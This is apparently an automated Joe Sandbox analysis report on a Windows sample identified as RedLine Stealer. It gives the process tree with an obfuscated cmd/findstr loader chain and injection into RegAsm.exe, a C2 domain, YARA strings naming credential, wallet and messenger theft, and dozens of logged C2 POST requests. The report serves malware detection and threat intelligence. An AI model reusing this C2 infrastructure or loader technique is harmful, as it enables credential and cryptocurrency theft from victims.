Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2YLM6BQ9S3.exe

Overview

General Information

Sample name:2YLM6BQ9S3.exe
renamed because original name is a hash value
Original sample name:7c86d24bf10f9a6970b3c7c86e455423.exe
Analysis ID:1593404
MD5:7c86d24bf10f9a6970b3c7c86e455423
SHA1:390d4d70d950a0e0f1a2744296e841bf70024b8d
SHA256:128985f1be0a64f43674e4e287eda262713c5bc3288582d97d1463b15d2d35f7
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2YLM6BQ9S3.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\2YLM6BQ9S3.exe" MD5: 7C86D24BF10F9A6970B3C7C86E455423)
    • cmd.exe (PID: 1996 cmdline: "C:\Windows\System32\cmd.exe" /c cmd < Ideale.adt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6464 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 2228 cmdline: findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Appartenga.exe.com (PID: 5656 cmdline: Appartenga.exe.com S MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • Appartenga.exe.com (PID: 6688 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com S MD5: C56B5F0201A3B3DE53E561FE76912BFD)
            • RegAsm.exe (PID: 1520 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • PING.EXE (PID: 5020 cmdline: ping 127.0.0.1 -n 30 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["gimpimageeditor.com:80"], "Bot Id": "20_1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
      • 0xcac0:$a2: https://ipinfo.io/ip%appdata%\
      • 0xd278:$a3: Software\Valve\SteamLogin Data
      • 0x8b75:$a4: get_ScannedWallets
      • 0x7aba:$a5: get_ScanTelegram
      • 0x87ec:$a6: get_ScanGeckoBrowsersPaths
      • 0x672c:$a7: <Processes>k__BackingField
      • 0x4698:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      • 0x6060:$a9: <ScanFTP>k__BackingField
      00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          8.3.Appartenga.exe.com.429f508.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            8.3.Appartenga.exe.com.429f508.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              8.3.Appartenga.exe.com.429f508.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
              • 0x14858:$a2: https://ipinfo.io/ip%appdata%\
              • 0x15010:$a3: Software\Valve\SteamLogin Data
              • 0x1090d:$a4: get_ScannedWallets
              • 0xf852:$a5: get_ScanTelegram
              • 0x10584:$a6: get_ScanGeckoBrowsersPaths
              • 0xe4c4:$a7: <Processes>k__BackingField
              • 0xc430:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
              • 0xddf8:$a9: <ScanFTP>k__BackingField
              8.3.Appartenga.exe.com.429f508.0.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
              • 0xedff:$gen01: ChromeGetRoamingName
              • 0xee33:$gen02: ChromeGetLocalName
              • 0xee5c:$gen03: get_UserDomainName
              • 0x10f8b:$gen04: get_encrypted_key
              • 0x10519:$gen05: browserPaths
              • 0x1087d:$gen06: GetBrowsers
              • 0x101c1:$gen07: get_InstalledInputLanguages
              • 0xdaa9:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
              • 0x14a08:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
              • 0x15490:$spe6: windows-1251, CommandLine:
              • 0x11723:$spe9: *wallet*
              • 0xc2c0:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
              • 0xc3bb:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
              • 0xc6fa:$typ03: A937C899247696B6565665BE3BD09607F49A2042
              • 0xc807:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
              • 0xc976:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
              • 0xc34c:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
              • 0xc375:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
              • 0xc50c:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
              • 0xc830:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
              • 0xc8c8:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
              8.3.Appartenga.exe.com.429f508.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0xd8e4:$u7: RunPE
              • 0x10e71:$u8: DownloadAndEx
              • 0x154a8:$pat14: , CommandLine:
              • 0x103d9:$v2_1: ListOfProcesses
              • 0xdae5:$v2_2: get_ScanVPN
              • 0xdb88:$v2_2: get_ScanFTP
              • 0xe873:$v2_2: get_ScanDiscord
              • 0xf836:$v2_2: get_ScanSteam
              • 0xf852:$v2_2: get_ScanTelegram
              • 0xf907:$v2_2: get_ScanScreen
              • 0x1054c:$v2_2: get_ScanChromeBrowsersPaths
              • 0x10584:$v2_2: get_ScanGeckoBrowsersPaths
              • 0x1085b:$v2_2: get_ScanBrowsers
              • 0x1090d:$v2_2: get_ScannedWallets
              • 0x10933:$v2_2: get_ScanWallets
              • 0x10953:$v2_3: GetArguments
              • 0x13a6a:$v2_3: GetArguments
              • 0xf100:$v2_4: VerifyUpdate
              • 0x13ab8:$v2_4: VerifyUpdate
              • 0x10d0f:$v2_5: VerifyScanRequest
              • 0x13a83:$v2_5: VerifyScanRequest
              Click to see the 10 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
              Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com S, ParentImage: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com, ParentProcessId: 6688, ParentProcessName: Appartenga.exe.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, ProcessId: 1520, ProcessName: RegAsm.exe
              Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com S, ParentImage: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com, ParentProcessId: 6688, ParentProcessName: Appartenga.exe.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, ProcessId: 1520, ProcessName: RegAsm.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-17T06:52:45.420272+010020343611Malware Command and Control Activity Detected192.168.2.54985776.223.67.18980TCP
              2025-01-17T06:52:47.817643+010020343611Malware Command and Control Activity Detected192.168.2.54985776.223.67.18980TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 2YLM6BQ9S3.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://gimpimageeditor.com/Avira URL Cloud: Label: malware
              Source: http://gimpimageeditor.com:80/Avira URL Cloud: Label: malware
              Source: http://gimpimageeditor.comAvira URL Cloud: Label: malware
              Source: gimpimageeditor.com:80Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["gimpimageeditor.com:80"], "Bot Id": "20_1"}
              Multi AV Scanner detection for submitted file
              Source: 2YLM6BQ9S3.exeReversingLabs: Detection: 57%
              Source: 2YLM6BQ9S3.exeVirustotal: Detection: 54%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
              Source: 2YLM6BQ9S3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: nHC:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000000A.00000002.3266505833.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.ServiceModel.pdbr62 source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbS source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000000A.00000000.2371566771.0000000000342000.00000002.00000001.01000000.00000006.sdmp, RegAsm.exe.8.dr
              Source: Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266505833.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: ystem.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3270045038.0000000005B2E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000000.2371566771.0000000000342000.00000002.00000001.01000000.00000006.sdmp, RegAsm.exe.8.dr
              Source: Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266824842.000000000095F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266824842.000000000095F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3270045038.0000000005B2E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbB source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_00402F3A FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402F3A
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004033DB GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_004033DB
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3494A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C3494A
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C34005
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C3C2FF
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00C3CD9F
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3CD14 FindFirstFileW,FindClose,6_2_00C3CD14
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C3F5D8
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C3F735
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C3FA36
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C33CE2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49857 -> 76.223.67.189:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: gimpimageeditor.com:80
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
